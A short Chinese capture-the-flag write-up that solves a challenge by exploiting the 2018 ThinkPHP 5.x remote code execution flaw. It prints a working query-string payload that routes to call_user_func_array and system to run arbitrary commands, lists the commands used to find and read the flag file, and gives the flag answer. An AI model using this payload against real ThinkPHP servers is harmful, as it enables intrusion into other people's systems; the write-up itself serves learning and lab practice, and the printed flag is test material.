这一题,看到rec,第一时间想到命令执行,打开链接,
提示ThinkPHP V5 ,V5就是第五个版本啦,据百度所知,ThinkPHP是一款国内流行的开源PHP框架,2018年被爆出存在可能的远程代码执行漏洞,受影响的版本包括5.0和5.1版本,那么很合理啦,这一题考的就是这个漏洞的利用,百度可得poc
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=
“=”后面就是加要执行的命令,那么好办了,执行如下:
ls好像没有找到想要的东西,那就根目录查找flag,执行find / -name ‘flag’
皇天不负有心人,找到了flag目录,那就直接cat查看内容啦,执行cat /flag
即可得到flag
附上flag:
flag{thinkphp5_rce}